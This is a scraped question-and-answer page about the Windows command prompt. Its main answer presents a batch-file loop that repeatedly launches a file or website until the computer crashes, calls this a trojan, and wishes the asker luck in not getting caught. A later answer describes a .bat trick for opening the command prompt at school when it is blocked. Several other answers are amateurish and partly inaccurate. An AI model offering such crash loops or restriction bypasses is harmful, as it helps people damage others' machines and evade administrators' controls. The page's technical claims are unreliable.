answersLogoWhite

0

You cannot create a virus directly from the command prompt, but you can create one from a batch file. I only know how to create trojans, in the form below, which must be entered in a notepad.

:loop

start "file"

goto loop

where "file" is typed, enter the syntax of the file or program you want to be opened, or a website address. that file, program, or website will then be repetatively opened until the computer crashes. Multiple files, programs, and websites can be set to be opened in the following format:

:loop

start "file"

start "file

goto loop

I hope this will help you, and i wish you luck in not getting caught, as creating viruses, trojans, and other malwear is illeagle.

User Avatar

Wiki User

14y ago

What else can I help you with?

Continue Learning about Engineering

What is the purpose of the command prompt?

the command prompt is a program where you can command the computer to perform functions such as shutdown, restart, open a certain file, start a program, etc.


How do you compile and execute a 16 bit compiler program from a command prompt?

Compiler-dependent. If you have Turbo C, it will be command TCC


What is interrupt in command prompt?

In the Command Prompt, an interrupt is a signal that halts the execution of a running command or process. This is typically achieved by pressing Ctrl + C, which sends an interrupt signal to the command line interface. This allows users to stop long-running tasks or commands that are no longer needed. It is a useful feature for maintaining control over command execution.


How do you open Command Prompt in school when the command prompt is blocked as well as run?

open notepad (right click new word doc) type in this @echo off command comand.com pause save this as somthing.bat the .bat is importaint now save this to your desk top at school and click on it that will open CMD


How can you undo something you put into command prompt?

There is usually no way to undo a command. Everything executed in the command prompt, is usually final, and has to be manually undone via the same way it was done. There are some command line programs that allow you to undo what it has done. But with the vagueness of your question I am unable to give you a definitive answer. NOTE: Deleting a file from the command line is irreversible and external software will be needed to retrieve the file.

Related Questions

What does arp -s do in command prompt?

it allows you to create a permanent entry in your cache


What is Windows Command Processor?

Command processor in windows is the command prompt(cmd). To start Windows command processor use winkey + R this will open Run window.Just type in cmd and this will open command prompt of windows where you can run various commands.You can create,delete files and folders, list the directory contents and can perform many other functions in command prompt.


How do you delete young dragon's sab hack?

If u have a virus, enter command prompt, type "del <sab hack file name>" and it will force delete the virus


How do remove USB Autorun Virus?

just choose 'Cancel'. Open the Command Prompt by typing 'cmd' in the run box. In the command prompt type the drive letter: and press enter . Now type dir /w/a and press enter.


How do you exit a prompt command?

Use "prompt $p$g" command.


Command prompt doesn't show if my PC is running in safe mode with command prompt?

Safe mode with command prompt option is totally depends on DOS shell, hence there is no need for separate command prompt..


Can a website shut down your computer?

Yes it can, it isn't really a virus it just goes to command prompt and shuts down your pc.


How do you do next line in command prompt?

when using command prompt, after you give it a command, press the enter button. Command prompt will then carry out the task and will automatically go to the next line.


How do you delete virus without antiVirus software?

AnswerYou can't delete a virus without antivirus software. The reason why is you would have to open ever file or your computer and examine the code. That's not easy because on the average computer there is about 100,000 files. Download windows live onecare from this websitehttp://onecare.live.com/standard/en-us/3/communications/trytoday.htmAnswerI don't really think a nonprofessional can do that. If you were a professional you could first identify the virus, then kill it by using the command prompt. If they open the command prompt, they can locate the virus to kill it. Ameteurs should not tinker with the command prompt because if they do, it could screw up your entire computer. If you don't have anti virus software, you can get it for free at securitytango.com


What do you know about PROMPT command in MS-DOS?

PROMPT command is an internal command, which is used to change the MS-DOS prompt. Through, the system displays the prompt bu default, when you start the computer.


How do you get the IPA of a computer from the command prompt?

In command prompt write "ipconfig/all" command and then press [enter]. And see the IPv4 Address section in the commend prompt.


What command is used to create a folder in the command prompt?

In Windows and Unix-based and Unix-like systems, the command is mkdir (however in Windows a shortcut md can be used as well).